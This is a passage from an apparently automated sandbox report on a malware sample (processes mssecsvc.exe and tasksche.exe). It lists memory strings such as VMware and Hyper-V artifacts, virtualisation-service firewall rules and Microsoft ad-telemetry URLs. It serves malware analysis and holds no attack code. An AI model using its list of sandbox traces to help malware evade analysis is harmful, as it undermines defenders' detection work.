0INC.&OEMID=VMWARE%2C%20INC.&OSSKU=PROFESSIONAL&SMBIOSDM=VMWARE7%2C1&TL=2&TSU=1611218&WAASBLDFLT=1&WAASCFGEXP=1&WAASCFGSET=1&WAASRETAIL=1&WAASRING=&CHNL=CFDwI
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@vmicheartbeat
              Source: svchost.exe, 00000021.00000002.817775099.00000247D36C5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@Allow inbound TCP port 636 traffic for vmicheartbeatLMEMp
              Source: backgroundTaskHost.exe, 00000024.00000003.521646632.000001D426635000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: api.iris.microsoft.com/v1/a/{ACTION}?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106558&cid=128000000001392729&tid=700342085&reqasid=62f7fc83080b4ea4bc961e27c15af7da&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&bSrc=i.t&time={DATETIME}&asid={ASID}&eid={EID}"}]},"class":"content","items":DMVER=10.0.17134.1&DEVFAM=WINDOWS.DESKTOP&DEVFORM=UNKNOWN&DISPHORZRES=1280&DISPSIZE=17.1&DISPVERTRES=1024&ISU=0&METERED=FALSE&NETTYPE=ETHERNET&NPID=SC-314559&OEMNAME=VMWARE%2C%20INC.&OEMID=VMWARE%2C%20INC.&OSSKU=PROFESSIONAL&SMBIOSDM=VMWARE7%2C1&TL=2&TSU=1611218&WAASBLDFLT=1&WAASCFGEXP=1&WAASCFGSET=1&WAASRETAIL=1&WAASRING=&CHNL=CFD":[{\"appPackageFamilyName\":\"ROBLOXCorporation.ROBLOX_55nm5eh3cm0pr\",\"entityId\":\"B_9NBLGGGZM6WM\",\"skuId\":\"0010\",\"productId\":\"9NBLGGGZM6WM\",\"applicationId\":\"ROBLOXCorporation.ROBLOX_55nm5eh3cm0pr!App\",\"options\":4,\"packageRelativeAppId\":\"App\",\"properties\":{\"storeCampaignId\":{\"text\":\"msft_1\"},\"installApp\":{\"bool\":false},\"installDelay\":{\"text\":\"medium\"},\"swapStartTile\":{\"event\":\"pin\",\"parameters\":{},\"action\":\"swapStartTile\"},\"displayName\":{\"text\":\"Roblox\"},\"phoneticName\":{\"text\":\"Roblox\"},\"packageSize\":{\"number\":143466514.0},\"launchStore\":{\"event\":\"clic
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: "@Block any inbound traffic for vmicvss
              Source: mssecsvc.exeBinary or memory string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Common-Drivers-Package~3
              Source: mssecsvc.exe, 00000004.00000000.263749691.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000004.00000002.663555779.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000006.00000000.272335422.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000006.00000002.357943271.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 0000000B.00000000.278856067.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 0000000B.00000002.384640585.0000000000710000.00000080.00000001.01000000.00000004.sdmp, tasksche.exe, 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Guest-Integration-Drivers-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
              Source: svchost.exe, 00000021.00000002.817775099.00000247D36C5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@Allow outbound TCP traffic for vmicheartbeatLMEM`
              Source: mssecsvc.exe, 00000006.00000002.361347885.0000000000D87000.00000004.00000020.00020000.00000000.sdmp, mssecsvc.exe, 00000006.00000002.361889160.0000000000DCF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.315005780.0000021C08828000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.311930287.0000021C08828000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.795555976.0000021C08828000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.681887539.000001FF10C57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.679528785.000001FF0B429000.00000004.00000020.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.388870583.0000019B7D338000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.353158659.0000019B7D325000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000002.542897680.0000019B7D338000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: dwm.exe, 0000001B.00000002.813088603.000002C6305D0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
              Source: backgroundTaskHost.exe, 00000024.00000003.562504340.000001D426635000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ementType=PostOOBE&app=&pid=425106558&cid=128000000001392729&tid=700342085&reqasid=62f7fc83080b4ea4bc961e27c15af7da&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&bSrc=i.t&time={DATETIME}&asid={ASID}&eid={EID}"}]},"class":"content","items":EG%2CPNG%2CGIF%2CJPG&H=1&W=1&TP=1&FESVER=1.3&CACHE_CHS=0&CACHE_IMP=0&CACHE_CHF=0&CACHE_DS=50583&CACHE_FS=32089&CACHE_SC=6&WPX=1&HPX=1&TIME=20220720T155045Z&PL=EN-US&CTMODE=MULTISESSION&ARCH=X64&CDMVER=10.0.17134.1&DEVFAM=WINDOWS.DESKTOP&DEVFORM=UNKNOWN&DISPHORZRES=1280&DISPSIZE=17.1&DISPVERTRES=1024&ISU=0&METERED=FALSE&NETTYPE=ETHERNET&NPID=SC-314559&OEMNAME=VMWARE%2C%20INC.&OEMID=VMWARE%2C%20INC.&OSSKU=PROFESSIONAL&SMBIOSDM=VMWARE7%2C1&TL=2&TSU=1611218&WAASBLDFLT=1&WAASCFGEXP=1&WAASCFGSET=1&WAASRETAIL=1&WAASRING=&CHNL=CFD","reuseCount":-1,"requiresNetwork":0,"expireTime":"2023-07-20T15:50:55","rotationPeriod":31536000}\"event\":\"pin\",\"parameters\":{},\"action\":\"swapStartTile\"},\"displayName\":{\"text\":\"Roblox\"},\"phoneticName\":{\"text\":\"Roblox\"},\"packageSize\":{\"number\":143466514.0},\"launchStore\":{\"event\":\"click\",\"parameters\":{\"uri\":\"ms-windows-store://pdp/?productid=9nblgggzm6wm&ocid=ems.dco.startprogrammable&ccid=62f7fc8
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ng-MPSS$@vmicheartbeat-allow-in-1nOnly
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@vmicvss
              Source: backgroundTaskHost.exe, 00000024.00000000.543434763.000001D426613000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {"itemPropertyManifest":{"storeCampaignId":{"type":"text","isOptional":true},"installApp":{"type":"boolean"},"installDelay":{"type":"text"},"swapStartTile":{"type":"action"},"displayName":{"type":"text"},"phoneticName":{"type":"text"},"packageSize":{"type":"numeric"},"launchStore":{"type":"action"},"onRender":{"type":"action"},"showNameOnMediumTile":{"type":"boolean"},"showNameOnWideTile":{"type":"boolean"},"showNameOnLargeTile":{"type":"boolean"},"smallTile":{"type":"image"},"collection":{"type":"numeric"},"mediumTile":{"type":"image"},"backgroundColor":{"type":"text"}},"propertyManifest":{},"properties":{},"tracking":{"events":[{"id":"impression"}],"parameterized":[{"uri":"https://ris.api.iris.microsoft.com/v1/a/{ACTION}?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106558&cid=128000000001392729&tid=700342085&reqasid=62f7fc83080b4ea4bc961e27c15af7da&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&bSrc=i.t&time={DATETIME}&asid={ASID}&eid={EID}"}]},"class":"content","items":EG%2CPNG%2CGIF%2CJPG&H=1&W=1&TP=1&FESVER=1.3&CACHE_CHS=0&CACHE_IMP=0&CACHE_CHF=0&CACHE_DS=50583&CACHE_FS=32089&CACHE_SC=6&WPX=1&HPX=1&TIME=20220720T155045Z&PL=EN-US&CTMODE=MULTISESSION&ARCH=X64&CDMVER=10.0.17134.1&DEVFAM=WINDOWS.DESKTOP&DEVFORM=UNKNOWN&DISPHORZRES=1280&DISPSIZE=17.1&DISPVERTRES=1024&ISU=0&METERED=FALSE&NETTYPE=ETHERNET&NPID=SC-314559&OEMNAME=VMWARE%2C%20INC.&OEMID=VMWARE%2C%20INC.&OSSKU=PROFESSIONAL&SMBIOSDM=VMWARE7%2C1&TL=2&TSU=1611218&WAASBLDFLT=1&WAASCFGEXP=1&WAASCFGSET=1&WAASRETAIL=1&WAASRING=&CHNL=CFD","reuseCount":-1,"requiresNetwork":0,"expireTime":"2023-07-20T15:50:55","rotationPeriod":31536000}\"event\":\"pin\",\"parameters\":{},\"action\":\"swapStartTile\"},\"displayName\":{\"text\":\"Roblox\"},\"phoneticName\":{\"text\":\"Roblox\"},\"packageSize\":{\"number\":143466514.0},\"launchStore\":{\"event\":\"click\",\"parameters\":{\"uri\":\"ms-windows-store://pdp/?productid=9nblgggzm6wm&ocid=ems.dco.startprogrammable&ccid=62f7fc8
              Source: svchost.exe, 00000021.00000002.817775099.00000247D36C5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@Allow inbound TCP port 389 traffic for vmicheartbeatLMEMp
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: "@vmicheartbeat
              Source: svchost.exe, 00000023.00000002.800948618.000002418A629000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000_0r
              Source: mssecsvc.exe, 00000004.00000000.263749691.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000004.00000002.663555779.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000006.00000000.272335422.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000006.00000002.357943271.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 0000000B.00000000.278856067.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 0000000B.00000002.384640585.0000000000710000.00000080.00000001.01000000.00000004.sdmp, tasksche.exe, 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Common-Drivers-Package~31bf3856ad364e35~x86~~6.1.7601.17514.catp
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: W$N.@vmicheartbeat-block-out
              Source: backgroundTaskHost.exe, 00000024.00000003.544877796.000001D426A50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ARE%2C%20INC.&OEMID=VMWARE%2C%20INC.&OSSKU=PROFESSIONAL&SMBIOSDM=VMWARE7%2C1&TL=2&TSU=1611218&WAASBLDFLT=1&WAASCFGEXP=1&WAASCFGSET=1&WAASRETAIL=1&WAASRING=&CHNL=CFD\",\"reuseCount\":-1,\"requiresNetwork\":0,\"expireTime\":\"2023-07-20T15:50:55\",\"rotationPeriod\":31536000}}"}],"refreshtime":"2022-07-27T15:50:55"}}
              Source: svchost.exe, 00000010.00000000.306971509.0000025CB586C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmicshutdown
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: .@Block any other inbound traffic for vmicheartbeat
              Source: svchost.exe, 00000021.00000002.817775099.00000247D36C5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@Allow outbound TCP traffic for vmicheartbeatLMEM`0~l
              Source: svchost.exe, 00000010.00000000.306971509.0000025CB586C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmicvss
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $@vmicshutdown
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@vmicshutdown-block-out
              Source: backgroundTaskHost.exe, 00000024.00000000.467119785.000001D4240CE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: post:https://arc.msn.com/v3/Delivery/Events/Impression=&PID=425106558&TID=700342085&CID=128000000001392729&BID=230696396&PG=PC000P0FR5.0000000IQ8&TPID=425106558&REQASID=BEEDE8C6B3A34585A9CD2D88614A35DA&ASID={ASID}&TIME={DATETIME}&SLOT=2&REQT=20220720T155055&MA_Score=2&LOCALID=w:D9BC7EDF-91E8-C8ED-3ED4-3B144B30C00C&DS_EVTID=62f7fc83080b4ea4bc961e27c15af7da&BCNT=1&PG=PC000P0FR5.0000000IQ8&UNID=314559&MAP_TID=F45BD19D-6B8E-42A3-8BE3-7AB3D0A2D2E6&NCT=1&PN=DA63DF93-3DBC-42AE-A505-B34988683AC7&ASID=BEEDE8C6B3A34585A9CD2D88614A35DA&REQASID=BEEDE8C6B3A34585A9CD2D88614A35DA&ARC=1&EMS=1&LOCALE=EN-US&COUNTRY=US&HTD=-1&LANG=1033&DEVLANG=EN&CIP=84.17.52.2&OPTOUTSTATE=256&HTTPS=1&PRODID=00000000-0000-0000-0000-000000000000&DVTP=2&DEVOSVER=10.0.17134.1&DEVOSMAJ=10&DEVOSMIN=0&DEVOSBLD=17134&DEVOSMINBLD=1&LOD=1118&LOH=24&LO=1611218&RAFB=0&MARKETBASEDCOUNTRY=US&CLR=CDM&CFMT=TEXT%2CIMAGE&SFT=JPEG%2CPNG%2CGIF%2CJPG&H=1&W=1&TP=1&FESVER=1.3&CACHE_CHS=0&CACHE_IMP=0&CACHE_CHF=0&CACHE_DS=50583&CACHE_FS=32089&CACHE_SC=6&WPX=1&HPX=1&TIME=20220720T155045Z&PL=EN-US&CTMODE=MULTISESSION&ARCH=X64&CDMVER=10.0.17134.1&DEVFAM=WINDOWS.DESKTOP&DEVFORM=UNKNOWN&DISPHORZRES=1280&DISPSIZE=17.1&DISPVERTRES=1024&ISU=0&METERED=FALSE&NETTYPE=ETHERNET&NPID=SC-314559&OEMNAME=VMWARE%2C%20INC.&OEMID=VMWARE%2C%20INC.&OSSKU=PROFESSIONAL&SMBIOSDM=VMWARE7%2C1&TL=2&TSU=1611218&WAASBLDFLT=1&WAASCFGEXP=1&WAASCFGSET=1&WAASRETAIL=1&WAASRING=&CHNL=CFD
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *@vmicheartbeat-block-in
              Source: backgroundTaskHost.exe, 00000024.00000000.523479263.000001D4267A6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {"_id":"B_9NBLGGGZM6WM_9WZDNCRFHWD2_9NH2GPH4JZS4_9NBLGGH6J6VK_9P6RC76MSMMJ_9WZDNCRFJ27N_9N0866FS04W8_9WZDNCRFJ10M_9WZDNCRFJ140_9NC2FBTHCJV8_9NBLGGH1CQ7L","startTime":"2019-05-25T00:30:00","_imp":"post:https://arc.msn.com/v3/Delivery/Events/Impression=&PID=425106558&TID=700342085&CID=128000000001392729&BID=230696396&PG=PC000P0FR5.0000000IQ8&TPID=425106558&REQASID=BEEDE8C6B3A34585A9CD2D88614A35DA&ASID={ASID}&TIME={DATETIME}&SLOT=2&REQT=20220720T155055&MA_Score=2&LOCALID=w:D9BC7EDF-91E8-C8ED-3ED4-3B144B30C00C&DS_EVTID=62f7fc83080b4ea4bc961e27c15af7da&BCNT=1&PG=PC000P0FR5.0000000IQ8&UNID=314559&MAP_TID=F45BD19D-6B8E-42A3-8BE3-7AB3D0A2D2E6&NCT=1&PN=DA63DF93-3DBC-42AE-A505-B34988683AC7&ASID=BEEDE8C6B3A34585A9CD2D88614A35DA&REQASID=BEEDE8C6B3A34585A9CD2D88614A35DA&ARC=1&EMS=1&LOCALE=EN-US&COUNTRY=US&HTD=-1&LANG=1033&DEVLANG=EN&CIP=84.17.52.2&OPTOUTSTATE=256&HTTPS=1&PRODID=00000000-0000-0000-0000-000000000000&DVTP=2&DEVOSVER=10.0.17134.1&DEVOSMAJ=10&DEVOSMIN=0&DEVOSBLD=17134&DEVOSMINBLD=1&LOD=1118&LOH=24&LO=1611218&RAFB=0&MARKETBASEDCOUNTRY=US&CLR=CDM&CFMT=TEXT%2CIMAGE&SFT=JPEG%2CPNG%2CGIF%2CJPG&H=1&W=1&TP=1&FESVER=1.3&CACHE_CHS=0&CACHE_IMP=0&CACHE_CHF=0&CACHE_DS=50583&CACHE_FS=32089&CACHE_SC=6&WPX=1&HPX=1&TIME=20220720T155045Z&PL=EN-US&CTMODE=MULTISESSION&ARCH=X64&CDMVER=10.0.17134.1&DEVFAM=WINDOWS.DESKTOP&DEVFORM=UNKNOWN&DISPHORZRES=1280&DISPSIZE=17.1&DISPVERTRES=1024&ISU=0&METERED=FALSE&NETTYPE=ETHERNET&NPID=SC-314559&OEMNAME=VMWARE%2C%20INC.&OEMID=VMWARE%2C%20INC.&OSSKU=PROFESSIONAL&SMBIOSDM=VMWARE7%2C1&TL=2&TSU=1611218&WAASBLDFLT=1&WAASCFGEXP=1&WAASCFGSET=1&WAASRETAIL=1&WAASRING=&CHNL=CFD","reuseCount":-1,"requiresNetwork":0,"expireTime":"2023-07-20T15:50:55","rotationPeriod":31536000}"
              Source: svchost.exe, 0000001A.00000002.793791069.000001B8BFC49000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmicheartbeat-allow-out
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ,@Allow inbound TCP port 389 traffic for vmicheartbeat
              Source: backgroundTaskHost.exe, 00000024.00000000.543434763.000001D426613000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Qpost:https://arc.msn.com/v3/Delivery/Events/Impression=&PID=425106558&TID=700342085&CID=128000000001392729&BID=230696396&PG=PC000P0FR5.0000000IQ8&TPID=425106558&REQASID=BEEDE8C6B3A34585A9CD2D88614A35DA&ASID={ASID}&TIME={DATETIME}&SLOT=2&REQT=20220720T155055&MA_Score=2&LOCALID=w:D9BC7EDF-91E8-C8ED-3ED4-3B144B30C00C&DS_EVTID=62f7fc83080b4ea4bc961e27c15af7da&BCNT=1&PG=PC000P0FR5.0000000IQ8&UNID=314559&MAP_TID=F45BD19D-6B8E-42A3-8BE3-7AB3D0A2D2E6&NCT=1&PN=DA63DF93-3DBC-42AE-A505-B34988683AC7&ASID=BEEDE8C6B3A34585A9CD2D88614A35DA&REQASID=BEEDE8C6B3A34585A9CD2D88614A35DA&ARC=1&EMS=1&LOCALE=EN-US&COUNTRY=US&HTD=-1&LANG=1033&DEVLANG=EN&CIP=84.17.52.2&OPTOUTSTATE=256&HTTPS=1&PRODID=00000000-0000-0000-0000-000000000000&DVTP=2&DEVOSVER=10.0.17134.1&DEVOSMAJ=10&DEVOSMIN=0&DEVOSBLD=17134&DEVOSMINBLD=1&LOD=1118&LOH=24&LO=1611218&RAFB=0&MARKETBASEDCOUNTRY=US&CLR=CDM&CFMT=TEXT%2CIMAGE&SFT=JPEG%2CPNG%2CGIF%2CJPG&H=1&W=1&TP=1&FESVER=1.3&CACHE_CHS=0&CACHE_IMP=0&CACHE_CHF=0&CACHE_DS=50583&CACHE_FS=32089&CACHE_SC=6&WPX=1&HPX=1&TIME=20220720T155045Z&PL=EN-US&CTMODE=MULTISESSION&ARCH=X64&CDMVER=10.0.17134.1&DEVFAM=WINDOWS.DESKTOP&DEVFORM=UNKNOWN&DISPHORZRES=1280&DISPSIZE=17.1&DISPVERTRES=1024&ISU=0&METERED=FALSE&NETTYPE=ETHERNET&NPID=SC-314559&OEMNAME=VMWARE%2C%20INC.&OEMID=VMWARE%2C%20INC.&OSSKU=PROFESSIONAL&SMBIOSDM=VMWARE7%2C1&TL=2&TSU=1611218&WAASBLDFLT=1&WAASCFGEXP=1&WAASCFGSET=1&WAASRETAIL=1&WAASRING=&CHNL=CFDementTyf
              Source: backgroundTaskHost.exe, 00000024.00000003.525688768.000001D42694B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MNVMWARE%2&OE
              Source: svchost.exe, 00000010.00000000.306971509.0000025CB586C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: "@vmicvss-block-in
              Source: lsass.exe, 00000009.00000002.798535635.00000240B2694000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
              Source: backgroundTaskHost.exe, 00000024.00000003.505466351.000001D426A18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {"_id":"B_9NBLGGGZM6WM_9WZDNCRFHWD2_9NH2GPH4JZS4_9NBLGGH6J6VK_9P6RC76MSMMJ_9WZDNCRFJ27N_9N0866FS04W8_9WZDNCRFJ10M_9WZDNCRFJ140_9NC2FBTHCJV8_9NBLGGH1CQ7L","startTime":"2019-05-25T00:30:00","_imp":"post:https://arc.msn.com/v3/Delivery/Events/Impression=&PID=425106558&TID=700342085&CID=128000000001392729&BID=230696396&PG=PC000P0FR5.0000000IQ8&TPID=425106558&REQASID=BEEDE8C6B3A34585A9CD2D88614A35DA&ASID={ASID}&TIME={DATETIME}&SLOT=2&REQT=20220720T155055&MA_Score=2&LOCALID=w:D9BC7EDF-91E8-C8ED-3ED4-3B144B30C00C&DS_EVTID=62f7fc83080b4ea4bc961e27c15af7da&BCNT=1&PG=PC000P0FR5.0000000IQ8&UNID=314559&MAP_TID=F45BD19D-6B8E-42A3-8BE3-7AB3D0A2D2E6&NCT=1&PN=DA63DF93-3DBC-42AE-A505-B34988683AC7&ASID=BEEDE8C6B3A34585A9CD2D88614A35DA&REQASID=BEEDE8C6B3A34585A9CD2D88614A35DA&ARC=1&EMS=1&LOCALE=EN-US&COUNTRY=US&HTD=-1&LANG=1033&DEVLANG=EN&CIP=84.17.52.2&OPTOUTSTATE=256&HTTPS=1&PRODID=00000000-0000-0000-0000-000000000000&DVTP=2&DEVOSVER=10.0.17134.1&DEVOSMAJ=10&DEVOSMIN=0&DEVOSBLD=17134&DEVOSMINBLD=1&LOD=1118&LOH=24&LO=1611218&RAFB=0&MARKETBASEDCOUNTRY=US&CLR=CDM&CFMT=TEXT%2CIMAGE&SFT=JPEG%2CPNG%2CGIF%2CJPG&H=1&W=1&TP=1&FESVER=1.3&CACHE_CHS=0&CACHE_IMP=0&CACHE_CHF=0&CACHE_DS=50583&CACHE_FS=32089&CACHE_SC=6&WPX=1&HPX=1&TIME=20220720T155045Z&PL=EN-US&CTMODE=MULTISESSION&ARCH=X64&CDMVER=10.0.17134.1&DEVFAM=WINDOWS.DESKTOP&DEVFORM=UNKNOWN&DISPHORZRES=1280&DISPSIZE=17.1&DISPVERTRES=1024&ISU=0&METERED=FALSE&NETTYPE=ETHERNET&NPID=SC-314559&OEMNAME=VMWARE%2C%20INC.&OEMID=VMWARE%2C%20INC.&OSSKU=PROFESSIONAL&SMBIOSDM=VMWARE7%2C1&TL=2&TSU=1611218&WAASBLDFLT=1&WAASCFGEXP=1&WAASCFGSET=1&WAASRETAIL=1&WAASRING=&CHNL=CFD","reuseCount":-1,"requiresNetwork":0,"expireTime":"2023-07-20T15:50:55","rotationPeriod":31536000}
              Source: backgroundTaskHost.exe, 00000024.00000000.467119785.000001D4240CE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: post:https://arc.msn.com/v3/Delivery/Events/Impression=&PID=425106554&TID=700342084&CID=128000000001392709&BID=1423522069&PG=PC000P0FR5.0000000IQ8&TPID=425106554&REQASID=BEEDE8C6B3A34585A9CD2D88614A35DA&ASID={ASID}&TIME={DATETIME}&SLOT=1&REQT=20220720T155055&MA_Score=2&LOCALID=w:D9BC7EDF-91E8-C8ED-3ED4-3B144B30C00C&DS_EVTID=dd1a8e84fd1343a98117c17a02a03b24&BCNT=1&PG=PC000P0FR5.0000000IQ8&UNID=314559&MAP_TID=F45BD19D-6B8E-42A3-8BE3-7AB3D0A2D2E6&NCT=1&PN=DA63DF93-3DBC-42AE-A505-B34988683AC7&ASID=BEEDE8C6B3A34585A9CD2D88614A35DA&REQASID=BEEDE8C6B3A34585A9CD2D88614A35DA&ARC=1&EMS=1&LOCALE=EN-US&COUNTRY=US&HTD=-1&LANG=1033&DEVLANG=EN&CIP=84.17.52.2&OPTOUTSTATE=256&HTTPS=1&PRODID=00000000-0000-0000-0000-000000000000&DVTP=2&DEVOSVER=10.0.17134.1&DEVOSMAJ=10&DEVOSMIN=0&DEVOSBLD=17134&DEVOSMINBLD=1&LOD=1118&LOH=24&LO=1611218&RAFB=0&MARKETBASEDCOUNTRY=US&CLR=CDM&CFMT=TEXT%2CIMAGE&SFT=JPEG%2CPNG%2CGIF%2CJPG&H=1&W=1&TP=1&FESVER=1.3&CACHE_CHS=0&CACHE_IMP=0&CACHE_CHF=0&CACHE_DS=50583&CACHE_FS=32089&CACHE_SC=6&WPX=1&HPX=1&TIME=20220720T155045Z&PL=EN-US&CTMODE=MULTISESSION&ARCH=X64&CDMVER=10.0.17134.1&DEVFAM=WINDOWS.DESKTOP&DEVFORM=UNKNOWN&DISPHORZRES=1280&DISPSIZE=17.1&DISPVERTRES=1024&ISU=0&METERED=FALSE&NETTYPE=ETHERNET&NPID=SC-314559&OEMNAME=VMWARE%2C%20INC.&OEMID=VMWARE%2C%20INC.&OSSKU=PROFESSIONAL&SMBIOSDM=VMWARE7%2C1&TL=2&TSU=1611218&WAASBLDFLT=1&WAASCFGEXP=1&WAASCFGSET=1&WAASRETAIL=1&WAASRING=&CHNL=CFD
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: "@Allow outbound TCP traffic for vmicheartbeat
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: &@vmicheartbeat
              Source: dwm.exe, 0000001B.00000002.813088603.000002C6305D0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000Y
              Source: svchost.exe, 00000010.00000000.300104611.0000025CB5036000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@vmicshutdown
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@Block any inbound traffic for vmicshutdown
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: "@Block any outbound traffic for vmicvss
              Source: backgroundTaskHost.exe, 00000024.00000000.467119785.000001D4240CE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: post:https://arc.msn.com/v3/Delivery/Events/Impression=&PID=425106554&TID=700342084&CID=128000000001392709&BID=1423522069&PG=PC000P0FR5.0000000IQ8&TPID=425106554&REQASID=BEEDE8C6B3A34585A9CD2D88614A35DA&ASID={ASID}&TIME={DATETIME}&SLOT=1&REQT=20220720T155055&MA_Score=2&LOCALID=w:D9BC7EDF-91E8-C8ED-3ED4-3B144B30C00C&DS_EVTID=dd1a8e84fd1343a98117c17a02a03b24&BCNT=1&PG=PC000P0FR5.0000000IQ8&UNID=314559&MAP_TID=F45BD19D-6B8E-42A3-8BE3-7AB3D0A2D2E6&NCT=1&PN=DA63DF93-3DBC-42AE-A505-B34988683AC7&ASID=BEEDE8C6B3A34585A9CD2D88614A35DA&REQASID=BEEDE8C6B3A34585A9CD2D88614A35DA&ARC=1&EMS=1&LOCALE=EN-US&COUNTRY=US&HTD=-1&LANG=1033&DEVLANG=EN&CIP=84.17.52.2&OPTOUTSTATE=256&HTTPS=1&PRODID=00000000-0000-0000-0000-000000000000&DVTP=2&DEVOSVER=10.0.17134.1&DEVOSMAJ=10&DEVOSMIN=0&DEVOSBLD=17134&DEVOSMINBLD=1&LOD=1118&LOH=24&LO=1611218&RAFB=0&MARKETBASEDCOUNTRY=US&CLR=CDM&CFMT=TEXT%2CIMAGE&SFT=JPEG%2CPNG%2CGIF%2CJPG&H=1&W=1&TP=1&FESVER=1.3&CACHE_CHS=0&CACHE_IMP=0&CACHE_CHF=0&CACHE_DS=50583&CACHE_FS=32089&CACHE_